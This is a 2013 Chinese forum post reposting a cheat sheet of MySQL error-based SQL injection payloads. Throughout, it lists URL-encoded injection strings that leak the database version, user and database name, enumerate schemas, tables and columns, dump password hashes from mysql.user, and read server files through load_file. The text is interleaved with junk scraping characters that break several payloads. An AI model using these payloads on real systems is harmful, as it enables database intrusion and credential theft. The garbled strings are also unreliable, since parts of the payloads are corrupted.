Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
" ~5 C( o; e, ]$ d" Q$ B
" a  ]% Y# ]: S! n3 ?! S6 L- ^
2 R* u2 y" i6 NMysql暴错注入参考（pdf），每天一贴。。。
4 z8 n# E4 i4 A8 p) J% ]; a) U2 A+ B
  y& K2 H# A2 m, S* V- p0 ^MySql Error Based Injection Reference
' X3 _! ~. n% \2 |/ Q; c[Mysql暴错注入参考]
8 x6 H- f5 \4 f% j* h# WAuthornig0s1992
% B' ^, q8 S- b# oBlog:http://pnig0s1992.blog.51cto.com/
- {7 A# N0 D! z# O( E  N8 \: t" DTeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
/ R4 }% Y) V, a( B2 |: X* j' kMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
( `# ]0 z' y- Z- j& V1 C3 h2 Ijoin+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
. i% ~, @, y+ `up by a)b)
4 g' ^, }  _# K. G* f. `查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
0 `! F) c5 v( r: b1 [. `Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
! I: N; j/ [8 i* \% pand(0)*2))x+from+information_schema.tables+group+by+x)a)
/ M  s* F  n9 a( n查询当前数据库:
0 _3 V/ K* y- HMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
6 c, S, O% L1 d1 C9 F2 e4 gMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
' z0 h4 S+ M9 s+ h; ^7 _LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
* _$ o0 n5 P: Y% a* F顺序替换
5 E8 ?+ G0 R" ~$ P" Q* O爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
- D1 G! `: L' T: `able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
. ^' Z5 c  ~9 V. ~+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
, M- E, @+ M2 V9 u' y, ^and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
+ s# F, ]$ b3 ?9 R. h4 c( |! {able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
& g! I2 p, T) F' a  p0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
( r- r& F- o. L# Mand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
; ]/ ^. `/ V1 g- v  p) f: z' K, s+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
$ h& S" d0 C" M- \. U1 `依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
) o. z* L3 R) g8 y# ]and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
' e' o3 u- v/ _: pfrom+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

" W5 e) K+ \( G" D7 z+ K不要下载也可以，
+ T8 T+ T3 x) W* k7 U# e: r